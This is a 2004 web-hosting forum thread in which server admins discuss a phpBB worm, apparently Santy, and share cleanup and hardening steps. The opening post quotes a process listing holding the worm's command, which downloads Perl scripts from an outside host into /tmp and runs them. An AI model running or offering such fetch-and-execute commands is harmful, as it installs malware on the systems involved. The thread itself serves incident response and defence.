1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice

Worm problem with apache 2.0.8

Discussion in 'Plesk for Linux - 8.x and Older' started by trec, Dec 26, 2004.

  1. trec

    trec New Pleskian

    24
    90%
    Joined:
    Nov 6, 2003
    Messages:
    19
    Likes Received:
    0
    I am having some strage process:

    apache 610 0.3 0.0 5320 1096 ? S 02:13 0:00 sh -c cd /tmp;wget www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt
    apache 611 0.3 0.0 6716 1608 ? S 02:13 0:00 wget www.visualcoders.net/spybot.txt
    apache 619 0.0 0.1 8232 3680 ? S 02:13 0:00 /usr/local/sbin/httpd - spy

    and there are several of the last one: httpd - spy

    it seems to be a worm, in /tmp there are several .txt files

    any clue on how to remove it?
     
  2. ptheborg

    ptheborg Guest

    0
     
    seems to be santy, are you running phpbb?

    You have to kill all httpd processes and restart apache. Remove all files in /tmp

    Upgrade phpbb to the latest version. Upgrade php (plesk 7.5.1) to be sure to have many security bugs fixed.
     
  3. lvalics

    lvalics Silver Pleskian Plesk Guru

    36
    43%
    Joined:
    Jun 20, 2003
    Messages:
    960
    Likes Received:
    28
    Location:
    Romania
  4. trec

    trec New Pleskian

    24
    90%
    Joined:
    Nov 6, 2003
    Messages:
    19
    Likes Received:
    0
    thanks ptheborg and Ivalics, thanks for the info, that's precisely the worm I have. The problem is I have several sites using phpBB (about 7) and others using PHPNuke, so disable phpBB or php applications is not the option for me right now.

    How can I secure the /tmp folder to not be executable?
    would this affect any other softare or function?

    I will be upgrading to Plesk 7.5.1 later today and also would like to make the correct changes on /tmp
     
  5. lvalics

    lvalics Silver Pleskian Plesk Guru

    36
    43%
    Joined:
    Jun 20, 2003
    Messages:
    960
    Likes Received:
    28
    Location:
    Romania
  6. aswitzer

    aswitzer Guest

    0
     
    Has anyone figure out how to completely stop these intrusions?

    I've upgaded php to 4.3.10, upgraded all phpBB's on my server to 2.0.11, and followed most of the steps (i.e. securing /tmp and renaming wget) that lvalics detailed on his site. (Thank lvalics)

    Still, every few hours my /tmp is full of random files that contain perl scripts or lists of phpBB sites that someone is scanning for using my server.

    I've searched thru google.com and I can't figure out what I am missing. How are they still getting in?
     
  7. NightStorm

    NightStorm Guest

    0
     
    Checked into mod_security yet?
    Short of a complete reimage of the server, about all you can do is assure that commands that can eploit the php bug can not be executed at all.
     
  8. lvalics

    lvalics Silver Pleskian Plesk Guru

    36
    43%
    Joined:
    Jun 20, 2003
    Messages:
    960
    Likes Received:
    28
    Location:
    Romania
    Sounds bad.
    Can be for example the attacker already in the system. Then it will be hard to kick out or almost impossibble and maybe (is maybe) require a full reinstall.
    There is several way to find out if they are inside, but is too long to write down here. I will try to point some ideeas, but depend on your Linux skill if you can or not fight against it.

    1. If is a BNCalready installed or some other program and he is already a root user, I suggest to act like you don't know about him for 1-2 days, and do a backup and save it somewhere on the other server (psadump). This is in case if he observe you and try to delete things and server crash, you need a full backup.

    2. Try to see what scripts install and each script how to act, where to install itself. Is not easy, because if this user is smart, then is hard to find out, he delete all logs, all clues.
    We have a program what we use it to hide ourself in this cases and we stay alerted when he login, to watch waht he do.
    This small perl script mig_logcleaner (what probbbly use him as well or something simlar) will hide you and he cannot see that you are logged in and he will work like noone is on server.
    You can watch what he do (reading root or user bah history before he delete it).

    3. Try to install a chrootkit (only after you have done point 1, full backup) and try to find out the worm.

    4. Try to run different commands like ps or netstat and try to see if you can find any anomalies in processess, for example you can see with netstat something like port - or port 6 used or things what is not normal.
    Is not easy to find them.

    5. Last thing is to reinstall OS clean install and restore PLESK.

    If you as not hacked already then you need to find out where, in which apache log he try to write.
    You can try to use tcpdump to see where these attackes come from, you can try to see also apache logs, but is almost impossibble if you have over 10 domains, to see it all.

    Maybe a nice ideea to PLESK to not log only to directory for each user, to log also for admin in one log for each domains, I don't know if it's possibble, but I as Admin I like to have always a possibilitie to see log for all domins in one file to look where can be a problem, insted search in all ...

    Hope this help.
     
  9. JLChafardet

    JLChafardet Regular Pleskian

    26
    57%
    Joined:
    Feb 20, 2004
    Messages:
    379
    Likes Received:
    0
    Location:
    Caracas - Venezuela
    may not fix all the holes but take a look at

    http://eth0.us

    he has posted a mod_security how-to that blocks some issues about phpbb, allowing you to keep phpbb on your servers, it may not be the completest ruleset, but it works! i have tested it on my test box and production box and works.

    regards,
     
  10. Bobby

    Bobby Guest

    0
     
    Hi,

    afaik the worm does not work if php safe_mode is activated ...

    Did you activate PHP safe_mode globaly?

    Regards,

    Bobby
     
  11. nickpick

    nickpick Guest

    0
     
    wget

    I didn't read this entire forum, but this issue was spoken about in another threat:
    http://forum.plesk.com/showthread.php?s=&postid=91894

    The easiest and quickest way to prevent sites for downloading the trojans is to simply rename your wget command to something else. So they won't be able to use this command at all and cannot download the trojans.

    This worked for me, but ofcourse it is not a definitive solution. It just saves you a lot of trouble right away.
     
  12. lvalics

    lvalics Silver Pleskian Plesk Guru

    36
    43%
    Joined:
    Jun 20, 2003
    Messages:
    960
    Likes Received:
    28
    Location:
    Romania
    or you can chmod 700 wget and should work as well.
     
Loading...